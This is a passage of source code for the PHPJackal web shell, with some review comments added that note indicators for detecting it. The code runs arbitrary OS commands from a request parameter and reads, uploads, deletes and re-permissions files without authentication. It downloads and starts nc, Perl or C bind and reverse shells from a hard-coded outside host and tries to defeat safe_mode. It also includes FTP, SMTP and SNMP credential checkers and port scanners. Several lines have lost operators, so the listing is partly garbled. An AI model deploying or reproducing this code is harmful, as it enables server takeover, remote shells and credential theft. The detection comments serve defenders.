elseif(function_exists('socket_set_timeout')){$scan=fsockopen("udp://$ip",$port);if($scan){socket_set_timeout($scan,$timeout);fwrite($scan,"\x00");$s=time();fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}}}return 0;}if(!function_exists('is_executable')){function is_executable($addr){return 0;}}if(!function_exists('file_get_contents')){function file_get_contents($addr){
// Fallback file_get_contents() for PHP builds that lack it. is_executable() (previous line) and
// file_put_contents() (next line) are shimmed the same way, each only when function_exists() reports it missing.
// NOTE(review): filesize() is handed the stream $a rather than the path $addr, and $a is read and closed
// before the if($a) check, so a failed fopen() is only noticed after it has already been used.
$a=fopen($addr,'r');$tmp=fread($a,filesize($a));fclose($a);if($a)return $tmp;else return null;}}if(!function_exists('file_put_contents')){function file_put_contents($addr,$con){$a=fopen($addr,'w');if(!$a)return 0;$t=fwrite($a,$con);fclose($a);if($t)return strlen($con);
return 0;}}function file_add_contentS($addr,$con){$a=fopen($addr,'a');if(!$a)return 0;fwrite($a,$con);fclose($a);return strlen($con);}if(!empty($_REQUEST['chmoD']) && !empty($_REQUEST['modE']))chmod($_REQUEST['chmoD'],'0'.$_REQUEST['modE']);
// NOTE(review): the top-level request handlers around this point (chmoD/modE on the previous line,
// downloaD and imagE on the following lines) pass $_REQUEST values straight to chmod(),
// file_get_contents(), filesize() and filemtime(). No authentication or path restriction is visible
// in this excerpt, so any requester can read or re-permission any file the PHP process can reach.
// The mixed-case parameter names (chmoD, modE, downloaD, imagE) are distinctive enough to search
// for in web-server access logs and request bodies when hunting for this script.
if(!empty($_REQUEST['downloaD'])){ob_clean();$dl=$_REQUEST['downloaD'];$con=file_get_contents($dl);header('Content-type: application/octet-stream');header("Content-disposition: attachment; filename=\"$dl\";");header('Content-length: '.strlen($con));echo $con;exit;}if(!empty($_REQUEST['imagE'])){$img=$_REQUEST['imagE'];header('Content-type: imagE/gif');
header("Content-length: ".filesize($img));header("Last-Modified: ".date('r',filemtime($img)));echo file_get_contents($img);
exit;}if(!empty($_REQUEST['exT'])){$ex=$_REQUEST['exT'];$e=get_extension_funcs($ex);echo
''.htmlspecialchars($ex).'Functions:
';foreach($e as $k=>$f){$i=$k+1;echo "$i)$f
";if(in_array($f,$disabl
efunctions))echo 'DISABLED';echo '
';}echo '';exit;}function
showsizE($size){if($size>=1073741824)$size=round(($size/1073741824),2).'
GB';elseif($size>=1048576)$size=round(($size/1048576),2).'
MB';elseif($size>=1024)$size=round(($size/1024),2).' KB';else
$size.=' B';return
$size;}$windows=(substr((strtoupper(php_uname())),0,3)=='WIN')?1:0;
$errorbox="Error: ";$v='1.9';$cwd=getcwd();$msgbox="
";$intro="Script:
".str_repeat('-=-',25)."
Name: PHPJackal
Version: $v
Author:
".str_repeat('-=-',25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru/
Email: [email protected]
".str_repeat('-=-',25)."
Error: Enable JavaScript in your browser!!
!$et";$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";$hcwd="";$t="";$crack="Dictionary:Dictionary type:Simple (P)Combo (U:P)Username:Server:Log $hcwd $et";function checkfunctioN($func){global $disablefunctions,$safemode;$safe=array('passthru','system','exec','shell_exec','popen','proc_open');
if($safemode=='ON' && in_array($func,$safe))return 0;elseif(function_exists($func) && is_callable($func) && !in_array($func,$disablefunctions))return 1;
return 0;}function whereistmP(){$uploadtmp=ini_get('upload_tmp_dir');$uf=getenv('USERPROFILE');$af=getenv('ALLUSERSPROFILE');$se=ini_get('session.save_path');
// whereistmP(): returns the first directory that exists and is writable, tried in this order:
// /tmp, /usr/tmp, /var/tmp, USERPROFILE, ALLUSERSPROFILE, session.save_path, upload_tmp_dir,
// TMP/TEMP; falls back to '.' (the current directory). Other functions in this file write
// their scratch and helper files into whatever this returns, so these are the directories to
// inspect for leftovers.
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';if(is_dir($uf) && is_writable($uf))return $uf;if(is_dir($af) && is_writable($af))return $af;if(is_dir($se) && is_writable($se))return $se;if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;return '.';}function shelL($command){
// shelL(): the command-execution sink of the script. $command is handed unmodified to the first
// primitive that checkfunctioN() reports usable: passthru, system, exec, shell_exec, popen,
// proc_open, then win_shell_execute and win32_create_service; after those come FFI (Windows),
// COM WScript.Shell and the perl extension.
// NOTE(review): hardening via disable_functions only affects the branches gated by checkfunctioN();
// the FFI, COM and perl branches are gated by extension_loaded() or object construction, so they
// stay reachable unless those extensions are absent. From the host side, child processes spawned
// by the web-server/PHP worker are the observable effect of every branch.
global $windows;$exec=$output='';$dep[]=array('pipe','r');$dep[]=array('pipe','w');if(checkfunctioN('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}elseif(checkfunctioN('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}elseif(checkfunctioN('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;}elseif(checkfunctioN('shell_exec'))$exec=shell_exec($command);elseif(checkfunctioN('popen')){$output=popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}elseif(checkfunctioN('proc_open')){$res=proc_open($command,$dep,$pipes);while(!f
eof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}elseif(checkfunctioN('win_shell_execute'))$exec=winshelL($command);elseif(checkfunctioN('win32_create_service'))$exec=srvshelL($command);elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);elseif(is_object($ws=new COM('WScript.Shell')))$exec=comshelL($command,$ws);elseif(extension_loaded('perl'))$exec=perlshelL($command);return $exec;}function getiT($get){$fo=strtolower(ini_get('allow_url_fopen'));$ui=strtolower(ini_get('allow_url_include'));
// getiT(): fetches the URL in $get and returns the body, using file_get_contents() when
// allow_url_fopen permits, include() when allow_url_include permits, and otherwise a hand-built
// HTTP/1.0 GET over fsockopen().
// NOTE(review): the include($get) branch executes whatever the remote server returns as PHP, not
// just downloads it. The raw-socket branch sends a fixed User-Agent and a Referer equal to the
// host name, which can be matched in egress proxy logs.
// NOTE(review): both conditions on the next line have lost an operator in this listing
// (`$fo $fo=='on'`, `$ui $ui=='on'`), so the text does not parse as shown — presumably an
// extraction artefact; confirm against an original sample before relying on the exact logic.
if($fo $fo=='on')$con=file_get_contents($get);elseif($ui $ui=='on'){ob_start();include($get);$con=ob_get_contents();ob_end_clean();}else{$u=parse_url($get);$host=$u['host'];$file=(empty($u['path']))?'/':$u['path'];$port=(empty($u['port']))?80:$u['port'];$url=fsockopen($host,$port,$en,$es,12);fputs($url,"GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nRefere
r: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");$tmp=$con='';
while($tmp!="\r\n")$tmp=fgets($url);while(!feof($url))$con.=fgets($url);}return $con;}function downloadiT($get,$put){$con=getiT($get);
$mk=file_put_contents($put,$con);if($mk)return 1;return 0;}function winshelL($command){$name=whereistmP()."\\".uniqid('NJ');win_shell_execute('cmd.exe','',"/C $command >\"$name\"");sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}
function ffishelL($command){$name=whereistmP()."\\".uniqid('NJ');$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function srvshelL($command){$name=whereistmP()."\\".uniqid('NJ');$n=uniqid('NJ');$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['Com
Spec'];win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));win32_start_service($n);win32_stop_service($n);win32_delete_service($n);while(!file_exists($name))sleep(1);$exec=file_get_contents($name);unlink($name);return $exec;}function comshelL($command,$ws){
$exec=$ws->exec("cmd.exe /c $command");$so=$exec->StdOut();return $so->ReadAll();}function perlshelL($command){$perl=new perl();ob_start();$perl->eval("system('$command')");$exec=ob_get_contents();ob_end_clean();return $exec;}function smtpchecK($addr,$user,$pass,$timeout){
$sock=fsockopen($addr,25,$n,$s,$timeout);if(!$sock)return -1;fread($sock,1024);
fputs($sock,'ehlo '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,1);if($res!='2')return 0;fgets($sock,512);fgets($sock,512);fgets($sock,512);fputs($sock,"AUTH LOGIN\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;
fputs($sock,base64_encode($user)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='334')return 0;fputs($sock,base64_encode($pass)."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='235')return 0;return 1;}function mysqlchecK($host,$user,$pass,$timeout){if(function_exists('mysql_connect')){$l=mysql_connect($host,$user,$pass);if($l)return 1;
}return 0;}function mssqlchecK($host,$user,$pass,$timeout){if(function_exists('mssql_connect')){$l=mssql_connect($host,$user,$pass);if($l)return 1;}return 0;}function checksmtP($host,$timeout){$from=strtolower(uniqid('nj')).'@'.strtolower(uniqid('nj')).'.com';$sock=fsockopen($host,25,$n,$s,$timeout);
if(!$sock)return -1;$res=substr(fgets($sock,512),0,3);if($res!='220')return 0;fputs($sock,'HELO '.uniqid('NJ')."\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"MAIL FROM: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;fputs($sock,"RCPT TO: \r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;
fputs($sock,"DATA\r\n");$res=substr(fgets($sock,512),0,3);if($res!='354')return 0;fputs($sock,"From: ".uniqid('NJ')." ".uniqid('NJ')." \r\nSubject: ".uniqid('NJ')."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".uniqid('Hello ',true)."\r\n.\r\n");$res=substr(fgets($sock,512),0,3);if($res!='250')return 0;return 1;}function replace_stR($s,$h){$ret=$h;foreach($s as $k=>$r)$ret=str_replace($k,$r,$ret);
return $ret;}function check_urL($url,$method,$search='200',$timeout=3){
$u=parse_url($url);$method=strtoupper($method);$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';$port=(empty($u['port']))?80:$u['port'];$data=(!empty($u['query']))?$u['query']:'';if(!empty($data))$data="?$data";$sock=fsockopen($host,$port,$en,$es,$timeout);
if($sock){fputs($sock,"$method $file$data HTTP/1.0\r\n");fputs($sock,"Host: $host\r\n");if($method=='GET')fputs($sock,"\r\n");elseif($method=='POST')fputs($sock,'Content-Type: application/x-www-form-urlencoded\r\nContent-length: '.strlen($data)."\r\nAccept-Encoding: text\r\nConnection:close\r\n\r\n$data");else return 0;if($search=='200')if(strstr(fgets($sock),'200')){fclose($sock);return 1;}else{fclose($sock);return 0;}while(!feof($sock)){$res=fgets($sock);
if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;}}fclose($sock);}return 0;}function get_sw_namE($host,$timeout){$sock=fsockopen($host,80,$en,$es,$timeout);if($sock){$page=uniqid('NJ');fputs($sock,"GET /$page HTTP/1.0\r\n\r\n");while(!feof($sock)){$con=fgets($sock);
if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;}}fclose($sock);return -1;}return 0;}function snmpchecK($ip,$com,$timeout){$res=0;$n=chr(0x00);$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01).chr(0x00).chr(0x04).chr(strlen($com)).$com.chr(0xA0).chr(0x19).chr(0x02).chr(0x01).chr(0x01).chr(0x02).chr(0x01).$n.chr(0x02).chr(0x01).$n.chr(0x30).chr(0x0E).chr(0x30).chr(0x0C).chr(0x06).chr
(0x08).chr(0x2B).chr(0x06).chr(0x01).chr(0x02).chr(0x01).chr(0x01).chr(0x01).$n.chr(0x05).$n;$sock=fsockopen("udp://$ip",161);if(function_exists('socket_set_timeout'))socket_set_timeout($sock,$timeout);fputs($sock,$packet);socket_set_timeout($sock,$timeout);$res=fgets($sock);fclose($sock);if($res != '')return 1;else return 0;}$safemode=(ini_get('safe_mode') strtolower(ini_get('safe_mode'))=='on')?'ON':'OFF';if($safemode=='ON'){ini_restore('safe_mode');ini_restore('open_basedir');}
// brshelL(): bind/reverse-shell launcher driven by the request parameters port, rport, ip and C.
// As written in the body that follows, it downloads a helper (an nc binary, or Perl/C source) from
// the hard-coded $addr via downloadiT(), stores it under whereistmP() with a uniqid('NJ_') name
// (dot-prefixed on non-Windows, marked hidden with `attrib +H` on Windows) and starts it through
// shelL(); the C variants are compiled on the host with gcc first.
// Detection notes: outbound HTTP from the web server to the $addr host, NJ_-prefixed files in
// temporary directories, and gcc, perl or a listening process appearing as children of the
// web-server/PHP worker are the artefacts this function leaves behind.
function brshelL(){global $errorbox,$windows,$et,$hcwd;$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
$addr='http://netjackal.by.ru/br';$error="$errorbox Can not make backdoor file, go to writeable folder.$et";$n=uniqid('NJ_');if(!$windows)$n=".$n";$d=whereistmP();$name=$d.DIRECTORY_SEPARATOR.$n;$c=($_REQUEST['C'])?1:0;
if(!empty($_REQUEST['port']) && ($_REQUEST['port']=1)){$port=(int)$_REQUEST['port'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winbind.p",$name);
shelL("attrib +H $name");if(!$bd)echo $error;else shelL("perl
$name
$port");}}else{if($c){$bd=downloadiT("$addr/bind.c",$name);if(!$bd)echo
$error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port
&");}else{$bd=downloadiT("$addr/bind.p",$name);if(!$bd)echo
$error;else shelL("cd $d;perl $n $port &");echo "Backdoor is
waiting for you on $port.
";
}}}elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']=1) && !empty($_REQUEST['ip'])){$ip=$_REQUEST['ip'];$port=(int)$_REQUEST['rport'];if($windows){if($c){$name.='.exe';$bd=downloadiT("$addr/nc",$name);shelL("attrib +H $name");
if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");}else{$name=$name.'.pl';$bd=downloadiT("$addr/winrc.p",$name);shelL("attrib +H $name");if (!$bd)echo $error;else shelL("perl.exe $name $ip $port");}}else{if($c){$bd=downloadiT("$addr/rc.c",$name);if(!$bd)echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
}else{$bd=downloadiT("$addr/rc.p",$name);if(!$bd)echo $error;else shelL("cd $d;perl $n $ip $port &");
}}echo 'Done!';}else{echo "Bind shell:Port:
Type:PERL";if($windows)echo 'EXE';else echo
'C';echo"$hcwd$etReverse shell:IP:Port:Type:PERL";if($windows)echo
'EXE';else echo 'C';echo"$hcwd$et$et";}}function
showimagE($img){echo "";}function editoR($file){global
$errorbox,$et,$hcwd,$cwd;if(is_file($file)){if(!is_readable($file)){echo
"$errorbox File is not readable$et
";}
if(!is_writeable($file)){echo "$errorbox File is not
writeable$et
";}$data=file_get_contents($file);echo "$hcwd$et
";echo htmlspecialchars($data);echo "";
}else {echo "$hcwd$et
";}echo "$hcwd$et";}
// webshelL(): renders the "Web Shell" panel. It builds a list of canned command labels (a Windows
// set or a Unix set, extended when certain cPanel/mail paths exist) and, when the `cmd` request
// parameter is non-empty, echoes the result of shelL($_REQUEST['cmd']).
// NOTE(review): the parameter reaches shelL() unmodified and no authentication check is visible in
// this function, so any request carrying `cmd` runs an OS command as the PHP process user.
// Requests with a `cmd` parameter to an unexpected .php file are the corresponding log indicator.
function webshelL(){global $windows,$hcwd,$et,$cwd;if($windows){
$alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUserslistTurn off the server";}
else{$alias="Display open portsShow last 250 logged in
usersDownloadersFind world-writable directoriesFind world-writable
directories(in current directory)Find world-writable filesFind
world-writable files(in current directory)Find files with SUID bit
setFind files with SGID bit setFind .htpasswd filesFind
.bash_history filesView syslog.confView hostsList of
processes";if(is_dir('/etc/valiases'))$alias.="List ofcPanel`s
domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List
cPanel`s
domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display
cPanel`s log";if(is_dir('/var/spool/mail/'))$alias.="Mailboxes
list";}echo "Location:$et
Web Shell:";if(!empty($_REQUEST['cmd']))echo
shelL($_REQUEST['cmd']);echo"$hcwd$alias$hcwd$et";
}function maileR(){global
$msgbox,$et,$hcwd;if(!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];if(mail($to,$subject,$body,"From:
$from"))echo "$msgboxMail sent!
$et";}echo "
Mailer:SMTP".ini_get('SMTP').'
('.ini_get('smtp_port').")From:$hcwdTo:
r='#666666'>Subject:Body:$et";
}function scanneR(){global $hcwd,$et;if(!empty($_SERVER['SERVER_ADDR']))$host=$_SERVER['SERVER_ADDR'];else $host='127.0.0.1';$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;if(($udp$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport'])&& !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){$target=$_REQUEST['target'];$from=(int)$_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu=0;echo 'Port scanning started against '.htmlspecialchars($target)
.':
';$start=time();for($i=$from;$i
if(strstr($port,','))$p=explode(',',$port);else $p[0]=$port;$open=$ser='';foreach($p as $po){$scan=checkthisporT($ip,$po,$timeout);if($scan){$ser='';if($ser=getservbyport($po,'tcp'))$ser="($ser)";
$open.=" $po$ser ";}}if($open){echo "$ip) Open ports:$open
";$output=1;}
}if(!empty($_REQUEST['httpbanner'])){$res=get_sw_namE($ip,$timeout);if($res){echo "$ip) Webserver software: ";if($res==-1)echo 'Unknow';else echo $res;
echo '
';$output=1;}}if(!empty($_REQUEST['httpscanner'])){if(checkthisporT($ip,80,$timeout)
&&
!empty($file)){$admin=array('/admin/','/adm/');$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgi
s/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');foreach($file as $v){$vuln=array();$v=trim($v);if(!$v $v{0}=='#')continue;$v=str_replace('","','^',$v);$v=str_replace('"','',$v);$vuln=explode('^',$v);$page=$cqich=$nukech=$adminch=$userch=$vuln[1];if(strstr($page,'@CGIDIRS'))foreach($cgi as $cg){$cqich=str_replace('@CGIDIRS',$cg,$page);
$url="http://$ip$cqich";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@ADMINDIRS'))foreach($admin as
$cg){$adminch=str_replace('@ADMINDIRS',$cg,$page);$url="http://$ip$adminch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}
elseif(strstr($page,'@USERS'))foreach($users as $cg){$userch=str_replace('@USERS',$cg,$page);
$url="http://$ip$userch";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}elseif(strstr($page,'@NUKE'))foreach($nuke as $cg){
$nukech=str_replace('@NUKE',$cg,$page);$url="http://$ip$nukech";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}else{$url="http://$ip$page";$res=check_urL($url,$vuln[3],$vuln[2],$timeout);if($res){$output=1;echo
"$ip)".$vuln[4]." $url
";}}
}}}if(!empty($_REQUEST['smtprelay'])){if(checkthisporT($ip,25,$timeout)){$res='';$res=checksmtP($ip,$timeout);if($res==1){echo
"$ip) SMTP relay found.
";$output=1;}}}if(!empty($_REQUEST['snmpscanner'])){if(checkthisporT($ip,161,$timeout,1)){$com=$_REQUEST['com'];
$coms=$res='';if(strstr($com,','))$c=explode(',',$com);else
$c[0]=$com;foreach($c as
$v){$ret=snmpchecK($ip,$v,$timeout);if($ret)$coms.=" $v
";}if($coms!=''){echo "$ip) SNMP FOUND: $coms
";$output=1;}}}if(!empty($_REQUEST['ftpscanner']) &&
function_exists('ftp_connect')){if(checkthisporT($ip,21,$timeout)){$usps=explode(',',$_REQUEST['userpass']);
foreach($usps as
$v){$user=substr($v,0,strpos($v,':'));$pass=substr($v,strpos($v,':')+1);if($pass=='[BLANK]')$pass='';$ftp=ftp_connect($ip,21,$timeout);if($ftp){if(ftp_login($ftp,$user,$pass)){$output=1;echo
"$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)."
(Connect)
";}}}}
}if($output)echo '';}
$time=time()-$start;echo "Done! ($time seconds)";if(!empty($buglist))unlink($buglist);}elseif(!empty($_REQUEST['directoryscanner'])){$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];echo "Scanning started...\n";
for($i=0;$i
bgcolor='#808080'>Get web bannerWebserver security scanningSMTP relay checkFTP password:SNMP:$et";}}function sysinfO(){global $windows,$disablefunctions,$cwd,$safemode;$t8="";$t6="";$mil="
$os=php_uname();$osn=php_uname('s');if(!$windows){$ker=php_uname('r');$o=($osn=='Linux')?'Linux+Kernel':$osn;$os=str_replace($osn,"${mil}$o'>$osn",$os);$os=str_replace($ker,"${mil}Linux+Kernel'>$ker",$os);
$inpa=':';}else{$sam=$sysroot."\\system32\\config\\SAM";$inpa=';';$os=str_replace($osn,"${mil}MS+Windows'>$osn",$os);}$cuser=get_current_user();if(!$cuser)$cuser='Unknow';$software=str_replace('Apache',"${mil}Apache'>Apache",$_SERVER['SERVER_SOFTWARE']);echo "Server information:${t6
}Server:".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "${t8}Operation system:$os$osver${t6}Web server application:$software${t8}CPU:$CPU${t6}Disk status:$disksize${t8}User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "${t6}User name:$cuser";if($windows){echo "${t8}Windows directory:$sysroot${t6}Sam file:";if(is_readable(($sam)))echo "Readable"; else echo 'Not readabl
e';echo '';}else{echo "${t8}UID - GID:".getmyuid().' - '.getmygid()."${t6}Recommended local root exploits:$xpl${t8}Passwd file:";if(is_readable('/etc/passwd'))echo "Readable";else echo'Not readable';echo "${t6}${mil}cpanel'>cPanel:";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "Readable";else echo 'Not readable';}else echo 'Not found';echo ')';}echo "$t8${mil}PHP'>PHP version:".PHP_VERSION." (more...)${t6}Zend version:";if (function_exists('zend_version')) echo "".zend_version().'';else echo 'Not Found';echo "${t8}Include path:".str_replace($inpa,'',DEFAULT_INCLUDE_PATH)."${t6}PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i)
)$i="($i)";$l=hlinK("exT=$v");echo "$v $i ";}echo "${t8}Disabled functions:";if(!empty($ds))echo "$d
s ";else echo 'Nothing'; echo"${t6}Safe mode:$safemode${t8}Open base dir:$basedir${t6}DBMS:";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL ";if(function_exists('ora_logon')) $sq.=" ${mil}Oracle'>Oracle ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL ";if
(function_exists('msql_connect')) $sq.= ' mSQL
';if(function_exists('mysqli_connect'))$sq.= ' MySQLi
';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if
($sq=='') $sq= 'Nothing'; echo "$sq";}function
checksuM($file){global $et;echo "MD5: ".md5_file($file).'
SHA1:'.sha1_file($file)."$et";}function
listdiR($cwd,$task){$c=getcwd();
$dh=opendir($cwd);while($cont=readdir($dh)){if($cont=='.' $cont=='..')continue;$adr=$cwd.DIRECTORY_SEPARATOR.$cont;switch($task){case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;case '1':if(is_writeable($adr)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;case '4':if(is_file($adr))echo "[$adr]\n";break;case '5':if(is_dir($adr))echo "[$adr]\n";break;case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '7':if(strstr($cont,$_REQUEST['search']) (is_file($adr) && strstr(file_g
et_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}}if(is_dir($adr))listdiR($adr,$task);}}if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}function filemanageR(){global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;$table="";$td1n="";$td2m="";
$td1i="";$td2i="";$tdnr="";$tdw="";if(!empty($_REQUEST['task'])){if(!empty($_REQUEST['search']))$_REQUEST['task']=7;if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
echo '';listdiR($cwd,$_REQUEST['task']);echo '';}else{if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV']) !empty($_REQUEST['rN'])){if(!empty($_REQUEST['cP']) !empty($_REQUEST['mV'])){$title='Destination';$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';}else{$ad=$_REQUEST['rN'];
$title='New name';$dis='Rename';}if(!!empty($_REQUEST['deS'])){echo "$title:$td1n$td2m$hcwd$et";}else{if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);else{copy($ad,$_REQUEST['deS']);
if(!empty($_REQUEST['mV']))unlink($ad);}}}if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else
unlink($_REQUEST['deL']);}if(!empty($_FILES['uploadfile'])){move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);echo
"$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']."
Filesize: ".$_FILES['uploadfile']['size']. "$et
";}
$select="--------
decoration:none' href='#' onClick=\"HS('div');\">- ] Location:$et";$file=$dir=$link=array();if($dirhandle=opendir($cwd)){while($cont=readdir($dirhandle)){if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;else $link[]=$cont;}closedir($dirhandle);sort($file);sort($dir);sort($link);echo "NameOwnerModification timeLast changeInfoSizeActions";$i=0;foreach($dir as $dn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($dn));$mdate=date('Y/m/d H:i:s',filemtime($dn));$adate=date('Y/m/d H:i:s',fileatime($dn));$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>OpenRenameRemove";
if($owner)$own="".$owner['name'].'';if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;echo "";if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '';echo $cl1."$own";echo $cl1."$mdate";echo $cl1."$adate";echo "$cl1";echo "";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W'
;echo '';echo "$cl1------";echo $cl2.$diraction;echo '';}foreach($file as $fn){echo '';$i++;$own='Unknow';$owner=posix_getpwuid(fileowner($fn));$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>OpenEditDownloadHex viewImageInclude
